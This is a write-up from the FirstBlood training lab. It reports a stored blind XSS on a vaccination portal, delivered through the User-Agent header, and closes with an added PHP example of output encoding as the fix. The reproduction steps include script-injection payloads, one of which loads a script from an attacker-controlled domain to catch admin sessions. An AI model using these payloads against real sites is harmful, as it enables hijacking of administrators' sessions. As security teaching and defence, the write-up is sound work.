FirstBlood-#726 [COLLAB with isitbug] Blind XSS through User-Agent header on Vaccination Management portal affecting admins
This issue was discovered on FirstBlood v2



On 2021-10-27, shreky Level 5 reported:

Summary

In the Vaccination Management portal, there's information about users who submitted their vaccination proof, which includes their User-Agent. We can make use of this to exploit a Blind XSS which will hit our XSShunter.com once an admin accesses the dashboard.
However, we can also make this XSS not so blind by just injecting, for example, <script>alert(document.domain)</script> in our User-Agent when uploading a vaccination proof. It will then trigger upon accessing /vaccination-manager/portal.php while being logged in.

Steps to reproduce

Blind way

  1. Inside Burp Suite's match & replace function, in the match section put your User-Agent's value, and ""><script src=yourdomain></script> in the replace section
  2. Go to /vaccination-manager/pub/upload-vaccination-proof.php, upload your proof and submit it
  3. Log in to the Vaccination Management over at /vaccination-manager/login.php
  4. Once you access the dashboard, check your XSSHunter tab.

Not so blind way

  1. Same as the blind version, but injecting <script>alert(document.domain)</script> in our User-Agent when uploading our vaccination proof.

Impact

Blind XSS that triggers once an admin accesses the Vaccination Management portal/dashboard/panel.

[Screenshot: (Blind way) XSSHunter tab]

[Screenshot: (Not so blind way) XSS triggering]

P2 High

Endpoint: /vaccination-manager/portal.php

Parameter: User-Agent header

Payload: ""><script src=yourdomain></script>


FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof, it is possible to achieve stored XSS against admins via the User-Agent value. As this value typically can't be user controlled, the developers did not think it was 'worth' protecting against XSS.
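
The fix is to treat the stored User-Agent like any other request data and encode it when the admin dashboard renders it. The following is an added example, not FirstBlood's code: the function names, the `$proof` array shape and the 256-byte cap are assumptions, and the sample header is the payload quoted in the report.

```php
<?php
declare(strict_types=1);

// Added example: NOT FirstBlood's code. Function names, the $proof array
// shape and the 256-byte cap are assumptions made for illustration.

// Ingestion: store the header as data, bounded in length. Nothing is
// "sanitized" here; escaping belongs at the point of output.
function capture_user_agent(array $server): string
{
    $ua = (string)($server['HTTP_USER_AGENT'] ?? '');
    // Strip control characters so the value cannot break log/table layout.
    $ua = preg_replace('/[\x00-\x1F\x7F]/', '', $ua) ?? '';
    return substr($ua, 0, 256);
}

// Vulnerable pattern: the stored header is concatenated into HTML as-is.
function render_row_vulnerable(array $proof): string
{
    return '<tr><td>' . $proof['user_agent'] . '</td></tr>';
}

// Hardened pattern: HTML-encode on output, quotes included, so the same
// stored value is displayed as text in element and attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_hardened(array $proof): string
{
    return '<tr><td title="' . h($proof['user_agent']) . '">'
         . h($proof['user_agent']) . '</td></tr>';
}

// Constructed request using the payload quoted in the report.
$proof = ['user_agent' => capture_user_agent(
    ['HTTP_USER_AGENT' => '<script>alert(document.domain)</script>']
)];

// Defence in depth for the admin page: no inline or third-party scripts.
// (header() only takes effect when served over HTTP, before any output.)
if (PHP_SAPI !== 'cli') {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

echo render_row_vulnerable($proof), PHP_EOL; // raw markup in the table cell
echo render_row_hardened($proof), PHP_EOL;   // entity-encoded, shown as text
```

Encoding at output rather than filtering at upload keeps the original header available for audit while ensuring every page that displays it, including ones added later, renders it as text.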